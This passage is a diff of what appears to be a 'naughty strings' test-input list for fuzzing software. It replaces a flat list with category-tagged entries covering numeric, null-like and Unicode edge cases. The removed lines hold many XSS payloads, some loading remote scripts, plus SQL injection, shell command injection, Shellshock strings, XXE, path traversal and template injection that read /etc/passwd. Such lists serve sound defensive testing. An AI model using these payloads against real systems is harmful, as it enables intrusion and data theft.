-  "<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x0Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x02javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "<a href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", 
-  "`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>", 
-  "`\"'><img src=xxx:x \\x22onerror=javascript:alert(1)>", 
-  "`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>", 
-  "`\"'><img src=xxx:x \\x0Donerror=javascript:alert(1)>", 
-  "`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>", 
-  "`\"'><img src=xxx:x \\x09onerror=javascript:alert(1)>", 
-  "`\"'><img src=xxx:x \\x0Conerror=javascript:alert(1)>", 
-  "`\"'><img src=xxx:x \\x00onerror=javascript:alert(1)>", 
-  "`\"'><img src=xxx:x \\x27onerror=javascript:alert(1)>", 
-  "`\"'><img src=xxx:x \\x20onerror=javascript:alert(1)>", 
-  "\"`'><script>\\x3Bjavascript:alert(1)</script>", 
-  "\"`'><script>\\x0Djavascript:alert(1)</script>", 
-  "\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>", 
-  "\"`'><script>\\xE2\\x80\\x81javascript:alert(1)</script>", 
-  "\"`'><script>\\xE2\\x80\\x84javascript:alert(1)</script>", 
-  "\"`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>", 
-  "\"`'><script>\\x09javascript:alert(1)</script>", 
-  "\"`'><script>\\xE2\\x80\\x89javascript:alert(1)</script>", 
-  "\"`'><script>\\xE2\\x80\\x85javascript:alert(1)</script>", 
-  "\"`'><script>\\xE2\\x80\\x88javascript:alert(1)</script>", 
-  "\"`'><script>\\x00javascript:alert(1)</script>", 
-  "\"`'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>", 
-  "\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>", 
-  "\"`'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>", 
-  "\"`'><script>\\x0Cjavascript:alert(1)</script>", 
-  "\"`'><script>\\x2Bjavascript:alert(1)</script>", 
-  "\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>", 
-  "\"`'><script>-javascript:alert(1)</script>", 
-  "\"`'><script>\\x0Ajavascript:alert(1)</script>", 
-  "\"`'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>", 
-  "\"`'><script>\\x7Ejavascript:alert(1)</script>", 
-  "\"`'><script>\\xE2\\x80\\x87javascript:alert(1)</script>", 
-  "\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>", 
-  "\"`'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>", 
-  "\"`'><script>\\xC2\\x85javascript:alert(1)</script>", 
-  "\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>", 
-  "\"`'><script>\\xE2\\x80\\x83javascript:alert(1)</script>", 
-  "\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>", 
-  "\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>", 
-  "\"`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>", 
-  "\"`'><script>\\x21javascript:alert(1)</script>", 
-  "\"`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>", 
-  "\"`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>", 
-  "\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>", 
-  "\"`'><script>\\x0Bjavascript:alert(1)</script>", 
-  "\"`'><script>\\x20javascript:alert(1)</script>", 
-  "\"`'><script>\\xC2\\xA0javascript:alert(1)</script>", 
-  "<img \\x00src=x onerror=\"alert(1)\">", 
-  "<img \\x47src=x onerror=\"javascript:alert(1)\">", 
-  "<img \\x11src=x onerror=\"javascript:alert(1)\">", 
-  "<img \\x12src=x onerror=\"javascript:alert(1)\">", 
-  "<img\\x47src=x onerror=\"javascript:alert(1)\">", 
-  "<img\\x10src=x onerror=\"javascript:alert(1)\">", 
-  "<img\\x13src=x onerror=\"javascript:alert(1)\">", 
-  "<img\\x32src=x onerror=\"javascript:alert(1)\">", 
-  "<img\\x47src=x onerror=\"javascript:alert(1)\">", 
-  "<img\\x11src=x onerror=\"javascript:alert(1)\">", 
-  "<img \\x47src=x onerror=\"javascript:alert(1)\">", 
-  "<img \\x34src=x onerror=\"javascript:alert(1)\">", 
-  "<img \\x39src=x onerror=\"javascript:alert(1)\">", 
-  "<img \\x00src=x onerror=\"javascript:alert(1)\">", 
-  "<img src\\x09=x onerror=\"javascript:alert(1)\">", 
-  "<img src\\x10=x onerror=\"javascript:alert(1)\">", 
-  "<img src\\x13=x onerror=\"javascript:alert(1)\">", 
-  "<img src\\x32=x onerror=\"javascript:alert(1)\">", 
-  "<img src\\x12=x onerror=\"javascript:alert(1)\">", 
-  "<img src\\x11=x onerror=\"javascript:alert(1)\">", 
-  "<img src\\x00=x onerror=\"javascript:alert(1)\">", 
-  "<img src\\x47=x onerror=\"javascript:alert(1)\">", 
-  "<img src=x\\x09onerror=\"javascript:alert(1)\">", 
-  "<img src=x\\x10onerror=\"javascript:alert(1)\">", 
-  "<img src=x\\x11onerror=\"javascript:alert(1)\">", 
-  "<img src=x\\x12onerror=\"javascript:alert(1)\">", 
-  "<img src=x\\x13onerror=\"javascript:alert(1)\">", 
-  "<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\">", 
-  "<img src=x onerror=\\x09\"javascript:alert(1)\">", 
-  "<img src=x onerror=\\x10\"javascript:alert(1)\">", 
-  "<img src=x onerror=\\x11\"javascript:alert(1)\">", 
-  "<img src=x onerror=\\x12\"javascript:alert(1)\">", 
-  "<img src=x onerror=\\x32\"javascript:alert(1)\">", 
-  "<img src=x onerror=\\x00\"javascript:alert(1)\">", 
-  "<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>", 
-  "<img src=\"x` `<script>javascript:alert(1)</script>\"` `>", 
-  "<img src onerror /\" '\"= alt=javascript:alert(1)//\">", 
-  "<title onpropertychange=javascript:alert(1)></title><title title=>", 
-  "<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(1)></a>\">", 
-  "<!--[if]><script>javascript:alert(1)</script -->", 
-  "<!--[if<img src=x onerror=javascript:alert(1)//]> -->", 
-  "<script src=\"/\\%(jscript)s\"></script>", 
-  "<script src=\"\\\\%(jscript)s\"></script>", 
-  "<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">", 
-  "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>", 
-  "<IMG SRC=# onmouseover=\"alert('xxs')\">", 
-  "<IMG SRC= onmouseover=\"alert('xxs')\">", 
-  "<IMG onmouseover=\"alert('xxs')\">", 
-  "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>", 
-  "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>", 
-  "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>", 
-  "<IMG SRC=\"jav   ascript:alert('XSS');\">", 
-  "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">", 
-  "<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">", 
-  "<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">", 
-  "perl -e 'print \"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";' > out", 
-  "<IMG SRC=\" &#14;  javascript:alert('XSS');\">", 
-  "<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", 
-  "<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", 
-  "<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", 
-  "<<SCRIPT>alert(\"XSS\");//<</SCRIPT>", 
-  "<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >", 
-  "<SCRIPT SRC=//ha.ckers.org/.j>", 
-  "<IMG SRC=\"javascript:alert('XSS')\"", 
-  "<iframe src=http://ha.ckers.org/scriptlet.html <", 
-  "\\\";alert('XSS');//", 
-  "<u oncopy=alert()> Copy me</u>", 
-  "<i onwheel=alert(1)> Scroll over me </i>", 
-  "<plaintext>", 
-  "http://a/%%30%30", 
-  "</textarea><script>alert(123)</script>", 
-  "1;DROP TABLE users", 
-  "1'; DROP TABLE users-- 1", 
-  "' OR 1=1 -- 1", 
-  "' OR '1'='1", 
-  "'; EXEC sp_MSForEachTable 'DROP TABLE ?'; --",
-  " ", 
-  "%", 
-  "_", 
-  "-", 
-  "--", 
-  "--version", 
-  "--help", 
-  "$USER", 
-  "/dev/null; touch /tmp/blns.fail ; echo", 
-  "`touch /tmp/blns.fail`", 
-  "$(touch /tmp/blns.fail)", 
-  "@{[system \"touch /tmp/blns.fail\"]}", 
-  "eval(\"puts 'hello world'\")", 
-  "System(\"ls -al /\")", 
-  "`ls -al /`", 
-  "Kernel.exec(\"ls -al /\")", 
-  "Kernel.exit(1)", 
-  "%x('ls -al /')", 
-  "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>", 
-  "$HOME", 
-  "$ENV{'HOME'}", 
-  "%d", 
-  "%s%s%s%s%s", 
-  "{0}", 
-  "%*.*s", 
-  "%@", 
-  "%n", 
-  "File:///", 
-  "../../../../../../../../../../../etc/passwd%00", 
-  "../../../../../../../../../../../etc/hosts", 
-  "() { 0; }; touch /tmp/blns.shellshock1.fail;", 
-  "() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }", 
-  "<<< %s(un='%s') = %u", 
-  "+++ATH0", 
-  "CON", 
-  "PRN", 
-  "AUX", 
-  "CLOCK$", 
-  "NUL", 
-  "A:", 
-  "ZZ:", 
-  "COM1", 
-  "LPT1", 
-  "LPT2", 
-  "LPT3", 
-  "COM2", 
-  "COM3", 
-  "COM4", 
-  "DCC SEND STARTKEYLOGGER 0 0 0", 
-  "Scunthorpe General Hospital", 
-  "Penistone Community Church", 
-  "Lightwater Country Park", 
-  "Jimmy Clitheroe", 
-  "Horniman Museum", 
-  "shitake mushrooms", 
-  "RomansInSussex.co.uk", 
-  "http://www.cum.qc.ca/", 
-  "Craig Cockburn, Software Specialist", 
-  "Linda Callahan", 
-  "Dr. Herman I. Libshitz", 
-  "magna cum laude", 
-  "Super Bowl XXX", 
-  "medieval erection of parapets", 
-  "evaluate", 
-  "mocha", 
-  "expression", 
-  "Arsenal canal", 
-  "classic", 
-  "Tyson Gay", 
-  "Dick Van Dyke", 
-  "basement", 
-  "If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.", 
-  "Roses are \u001b[0;31mred\u001b[0m, violets are \u001b[0;34mblue. Hope you enjoy terminal hue", 
-  "But now...\u001b[20Cfor my greatest trick...\u001b[8m", 
-  "The quic\b\b\b\b\b\bk brown fo\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007x... [Beeeep]", 
-  "Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗", 
-  "🏳0🌈️",
-  "జ్ఞ‌ా",
-  "گچپژ",
-  "{% print 'x' * 64 * 1024**3 %}",
-  "{{ \"\".__class__.__mro__[2].__subclasses__()[40](\"/etc/passwd\").read() }}"
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "undefined"
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "undef"
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "null"
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "NULL"
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "(null)"
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "nil"
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "NIL"
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "true"
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "false"
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "True"
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "False"
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "TRUE"
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "FALSE"
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "None"
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "hasOwnProperty"
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "then"
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "constructor"
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "\\"
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "\\\\"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1.00"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "$1.00"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1/2"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1E2"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1E02"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1E+02"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-1"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-1.00"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-$1.00"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-1/2"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-1E2"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-1E02"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-1E+02"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1/0"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0/0"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-2147483648/-1"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-9223372036854775808/-1"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-0"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-0.0"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "+0"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "+0.0"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0.00"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0..0"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "."
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0.0.0"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0,00"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0,,0"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": ","
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0,0,0"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0.0/0"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1.0/0.0"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0.0/0.0"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1,0/0,0"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0,0/0,0"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "--1"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-."
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-,"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "NaN"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "Infinity"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-Infinity"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "INF"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1#INF"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-1#IND"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1#QNAN"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1#SNAN"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1#IND"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0x0"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0xffffffff"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0xffffffffffffffff"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0xabad1dea"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "123456789012345678901234567890123456789"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1,000.00"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1 000.00"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1'000.00"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1,000,000.00"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1 000 000.00"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1'000'000.00"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1.000,00"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1 000,00"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1'000,00"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1.000.000,00"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1 000 000,00"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1'000'000,00"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "01000"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "08"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "09"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "2.2250738585072011e-308"
+  },
+  {
+    "category": "contexts.  Divided into three groups based on (US-layout) keyboard position.",
+    "string": ",./;'[]\\-="
+  },
+  {
+    "category": "contexts.  Divided into three groups based on (US-layout) keyboard position.",
+    "string": "<>?:\"{}|_+"
+  },
+  {
+    "category": "contexts.  Divided into three groups based on (US-layout) keyboard position.",
+    "string": "!@#$%^&*()`~"
+  },
+  {
+    "category": "The next line may appear to be blank or mojibake in some viewers.",
+    "string": "\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b\u000e\u000f\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f"
+  },
+  {
+    "category": "The next line may appear to be blank, mojibake, or dingbats in some viewers.",
+    "string": ""
+  },
+  {
+    "category": "The next line may be flagged for \"trailing whitespace\" in some viewers.",
+    "string": "​"
+  },
+  {
+    "category": "The next line may appear to be blank or mojibake in some viewers.",
+    "string": "­؀؁؂؃؄؅؜۝܏᠎​‌‍‎‏‪‫‬‭‮⁠⁡⁢⁣⁤⁦⁧⁨⁩⁪⁫⁬⁭⁮⁯﻿￹￺￻𑂽𛲠𛲡𛲢𛲣𝅳𝅴𝅵𝅶𝅷𝅸𝅹𝅺󠀁󠀠󠀡󠀢󠀣󠀤󠀥󠀦󠀧󠀨󠀩󠀪󠀫󠀬󠀭󠀮󠀯󠀰󠀱󠀲󠀳󠀴󠀵󠀶󠀷󠀸󠀹󠀺󠀻󠀼󠀽󠀾󠀿󠁀󠁁󠁂󠁃󠁄󠁅󠁆󠁇󠁈󠁉󠁊󠁋󠁌󠁍󠁎󠁏󠁐󠁑󠁒󠁓󠁔󠁕󠁖󠁗󠁘󠁙󠁚󠁛󠁜󠁝󠁞󠁟󠁠󠁡󠁢󠁣󠁤󠁥󠁦󠁧󠁨󠁩󠁪󠁫󠁬󠁭󠁮󠁯󠁰󠁱󠁲󠁳󠁴󠁵󠁶󠁷󠁸󠁹󠁺󠁻󠁼󠁽󠁾󠁿"
+  },
+  {
+    "category": "The next two lines may appear to be blank or mojibake in some viewers.",
+    "string": "﻿"
+  },
+  {
+    "category": "The next two lines may appear to be blank or mojibake in some viewers.",
+    "string": "￾"
+  },
+  {
+    "category": "Strings which contain common unicode symbols (e.g. smart quotes)",
+    "string": "Ω≈ç√∫˜µ≤≥÷"
+  },
+  {
+    "category": "Strings which contain common unicode symbols (e.g. smart quotes)",
+    "string": "åß∂ƒ©˙∆˚¬…æ"
+  },
+  {
+    "category": "Strings which contain common unicode symbols (e.g. smart quotes)",
+    "string": "œ∑´®†¥¨ˆøπ“‘"
+  },
+  {
+    "category": "Strings which contain common unicode symbols (e.g. smart quotes)",
+    "string": "¡™£¢∞§¶•ªº–≠"
+  },
+  {
+    "category": "Strings which contain common unicode symbols (e.g. smart quotes)",
+    "string": "¸˛Ç◊ı˜Â¯˘¿"
+  },
+  {
+    "category": "Strings which contain common unicode symbols (e.g. smart quotes)",
+    "string": "ÅÍÎÏ˝ÓÔÒÚÆ☃"
+  },
+  {
+    "category": "Strings which contain common unicode symbols (e.g. smart quotes)",
+    "string": "Œ„´‰ˇÁ¨ˆØ∏”’"
+  },
+  {
+    "category": "Strings which contain common unicode symbols (e.g. smart quotes)",
+    "string": "`⁄€‹›ﬁﬂ‡°·‚—±"
+  },
+  {
+    "category": "Strings which contain common unicode symbols (e.g. smart quotes)",
+    "string": "⅛⅜⅝⅞"
+  },
+  {
+    "category": "Strings which contain common unicode symbols (e.g. smart quotes)",
+    "string": "ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя"
+  },
+  {
+    "category": "Strings which contain common unicode symbols (e.g. smart quotes)",
+    "string": "٠١٢٣٤٥٦٧٨٩"
+  },
+  {
+    "category": "Strings which contain unicode subscripts/superscripts; can cause rendering issues",
+    "string": "⁰⁴⁵"
+  },
+  {
+    "category": "Strings which contain unicode subscripts/superscripts; can cause rendering issues",
+    "string": "₀₁₂"
+  },
+  {
+    "category": "Strings which contain unicode subscripts/superscripts; can cause rendering issues",
+    "string": "⁰⁴⁵₀₁₂"
+  },
+  {
+    "category": "Strings which contain unicode subscripts/superscripts; can cause rendering issues",
+    "string": "ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็"
+  },
+  {
+    "category": "Strings which contain misplaced quotation marks; can cause encoding errors",
+    "string": "'"
+  },
+  {
+    "category": "Strings which contain misplaced quotation marks; can cause encoding errors",
+    "string": "\""
+  },
+  {
+    "category": "Strings which contain misplaced quotation marks; can cause encoding errors",
+    "string": "''"
+  },
+  {
+    "category": "Strings which contain misplaced quotation marks; can cause encoding errors",
+    "string": "\"\""
+  },
+  {
+    "category": "Strings which contain misplaced quotation marks; can cause encoding errors",
+    "string": "'\"'"
+  },
+  {
+    "category": "Strings which contain misplaced quotation marks; can cause encoding errors",
+    "string": "\"''''\"'\""
+  },
+  {
+    "category": "Strings which contain misplaced quotation marks; can cause encoding errors",
+    "string": "\"'\"'\"''''\""
+  },
+  {
+    "category": "Strings which contain misplaced quotation marks; can cause encoding errors",
+    "string": "<foo val=“bar” />"
+  },
+  {
+    "category": "Strings which contain misplaced quotation marks; can cause encoding errors",
+    "string": "<foo val=“bar” />"
+  },
+  {
+    "category": "Strings which contain misplaced quotation marks; can cause encoding errors",
+    "string": "<foo val=”bar“ />"
+  },
+  {
+    "category": "Strings which contain misplaced quotation marks; can cause encoding errors",
+    "string": "<foo val=`bar' />"
+  },
+  {
+    "category": "Strings which contain two-byte characters: can cause rendering issues or character-length issues",
+    "string": "田中さんにあげて下さい"
+  },
+  {
+    "category": "Strings which contain two-byte characters: can cause rendering issues or character-length issues",
+    "string": "パーティーへ行かないか"
+  },
+  {
+    "category": "Strings which contain two-byte characters: can cause rendering issues or character-length issues",
+    "string": "和製漢語"
+  },
+  {
+    "category": "Strings which contain two-byte characters: can cause rendering issues or character-length issues",
+    "string": "部落格"
+  },
+  {
+    "category": "Strings which contain two-byte characters: can cause rendering issues or character-length issues",
+    "string": "사회과학원 어학연구소"
+  },
+  {
+    "category": "Strings which contain two-byte characters: can cause rendering issues or character-length issues",
+    "string": "찦차를 타고 온 펲시맨과 쑛다리 똠방각하"
+  },
+  {
+    "category": "Strings which contain two-byte characters: can cause rendering issues or character-length issues",
+    "string": "社會科學院語學研究所"
+  },
+  {
+    "category": "Strings which contain two-byte characters: can cause rendering issues or character-length issues",
+    "string": "울란바토르"
+  },
+  {
+    "category": "Strings which contain two-byte characters: can cause rendering issues or character-length issues",
+    "string": "𠜎𠜱𠝹𠱓𠱸𠲖𠳏"
+  },
+  {
+    "category": "Strings which contain two-byte letters: can cause issues with naïve UTF-16 capitalizers which think that 16 bits == 1 character",
+    "string": "𐐜 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐙𐐊𐐡𐐝𐐓/𐐝𐐇𐐗𐐊𐐤𐐔 𐐒𐐋𐐗 𐐒𐐌 𐐜 𐐡𐐀𐐖𐐇𐐤𐐓𐐝 𐐱𐑂 𐑄 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐏𐐆𐐅𐐤𐐆𐐚𐐊𐐡𐐝𐐆𐐓𐐆"
+  },
+  {
+    "category": "𠀀          CJK Ideograph Extension B, First (U+20000)",
+    "string": "表ポあA鷗ŒéＢ逍Üßªąñ丂㐀𠀀"
+  },
+  {
+    "category": "Credit: https://twitter.com/jifa/status/625776454479970304",
+    "string": "Ⱥ"
+  },
+  {
+    "category": "Credit: https://twitter.com/jifa/status/625776454479970304",
+    "string": "Ⱦ"
+  },
+  {
+    "category": "Strings which consists of Japanese-style emoticons which are popular on the web",
